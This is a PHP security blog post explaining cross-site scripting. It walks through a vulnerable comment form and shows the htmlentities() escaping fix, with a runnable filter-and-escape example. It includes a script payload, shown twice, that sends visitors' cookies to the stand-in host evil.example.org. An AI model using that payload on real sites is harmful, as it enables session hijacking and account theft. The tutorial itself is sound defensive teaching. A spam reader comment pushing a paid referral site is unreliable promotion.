Cross-Site Scripting

Cross-site scripting (XSS) is deservedly one of the best known types of attacks. It plagues web applications on all platforms, and PHP applications are certainly no exception.

Any application that displays input is at risk: web-based email applications, forums, guestbooks, and even blog aggregators. In fact, most web applications display input of some type; this is what makes them interesting, but it is also what places them at risk. If this input is not properly filtered and escaped, a cross-site scripting vulnerability exists.

Consider a web application that allows users to enter comments on each page. The following form can be used to facilitate this:

<form action="comment.php" method="POST">
<p>Name: <input type="text" name="name" /><br />
Comment: <textarea name="comment" rows="10" cols="60"></textarea><br />
<input type="submit" value="Add Comment" /></p>
</form>

The application displays comments to other users who visit the page. For example, code similar to the following can be used to output a single comment ($comment) and corresponding name ($name):

<?php
echo "<p>$name writes:<br />";
echo "<blockquote>$comment</blockquote></p>";
?>

This approach places a significant amount of trust in the values of both $comment and $name. Imagine that one of them contained the following:

<script>
document.location =
'http://evil.example.org/steal.php?cookies=' +
document.cookie
</script>

If this comment is sent to your users, it is no different than if you had allowed someone else to add this bit of JavaScript to your source. Your users will involuntarily send their cookies (the ones associated with your application) to evil.example.org, and the receiving script (steal.php) can access all of the cookies in $_GET['cookies'].

This is a common mistake, and it is proliferated by many bad habits that have become commonplace. Luckily, the mistake is easy to avoid. Because the risk exists only when you output tainted, unescaped data, you can simply make sure that you filter input and escape output.

At the very least, you should use htmlentities() to escape any data that you send to the client; this function converts all special characters into their HTML entity equivalents. Thus, any character that the browser interprets in a special way is converted to its HTML entity equivalent so that its original value is preserved.

The following replacement for the code to display a comment is a much safer approach:

<?php
$clean = array();
$html = array();

/* Filter Input ($name, $comment): populate $clean['name'] and
   $clean['comment'] with values that have passed validation */

/* Escape Output: only the escaped copies in $html are sent to the client */
$html['name'] = htmlentities($clean['name'], ENT_QUOTES, 'UTF-8');
$html['comment'] = htmlentities($clean['comment'], ENT_QUOTES, 'UTF-8');

echo "<p>{$html['name']} writes:<br />";
echo "<blockquote>{$html['comment']}</blockquote></p>";
?>
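The filter-input / escape-output pattern above carried through as runnable PHP, as an added example that is not code from the original post. It assumes a constructed $fakePost array in place of $_POST and an assumed validation rule for the name field; the cookie-stealing payload shown earlier is used as the sample comment.

```php
<?php
// Added example, not code from the original post: the filter-input /
// escape-output pattern as two functions, run against the cookie-stealing
// payload from the text. A constructed $fakePost array stands in for $_POST
// so the script runs from the command line.

// Filter input: return only values the application expects, or null.
function filter_comment_input(array $post): ?array
{
    if (!isset($post['name'], $post['comment'])
        || !is_string($post['name']) || !is_string($post['comment'])) {
        return null;
    }
    // Assumed rule: a name is 1-40 letters, digits, spaces, dots, apostrophes or hyphens.
    if (!preg_match('/^[\p{L}\p{N} .\'-]{1,40}$/u', $post['name'])) {
        return null;
    }
    // A comment must be valid UTF-8 and 1-2000 characters; its content is
    // otherwise free text, so safety comes from escaping at output time.
    if (!mb_check_encoding($post['comment'], 'UTF-8')
        || mb_strlen($post['comment'], 'UTF-8') < 1
        || mb_strlen($post['comment'], 'UTF-8') > 2000) {
        return null;
    }
    return ['name' => $post['name'], 'comment' => $post['comment']];
}

// Escape output: every character HTML treats specially becomes an entity,
// so the browser renders the payload as text instead of executing it.
// ENT_QUOTES also escapes ' and ", which keeps $html['name'] safe inside a
// quoted attribute such as value="..." when the form is redisplayed.
function render_comment(array $clean): string
{
    $html = [];
    $html['name'] = htmlentities($clean['name'], ENT_QUOTES, 'UTF-8');
    $html['comment'] = htmlentities($clean['comment'], ENT_QUOTES, 'UTF-8');
    return "<p>{$html['name']} writes:</p>\n"
         . "<blockquote>{$html['comment']}</blockquote>\n";
}

// Constructed request: the <script> payload from the text, submitted as a comment.
$fakePost = [
    'name'    => 'Mallory',
    'comment' => "<script>document.location = 'http://evil.example.org/steal.php?cookies=' + document.cookie</script>",
];

$clean = filter_comment_input($fakePost);
echo $clean === null ? "comment rejected\n" : render_comment($clean);
```

htmlentities() covers data placed in HTML element content and quoted attributes; data placed inside a script block, a URL, or a stylesheet needs the escaping rules of that context instead.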

2 comments:

Anonymous said...

Hi Gaara,

You have a very cool Blog…loved the content.
I have a question..
- “Seeking experienced programmer with following skills: strong browser UI background, specifically in JavaScript, AJAX, CSS, HTML. Also must have good system & software design skills, e.g. OOP. C++/C knowledge a plus”

I came across this site called Myndnet.com where u get paid if u answer this question.
It’s a platform for people to buy and sell Technology related information. Good money for people like us in the IT domain.
Here the link http://www.myndnet.com/login.jsp?referral=alpa83&channel=AA6

Sign up is free…check it out…
You can contact me at my id here for more questions : barot.alpa@gmail.com

Cheers :)
Alpa

Emma said...

Huh, the way it is explained here is really admirable... I found it very easy to understand.

PHP Programming
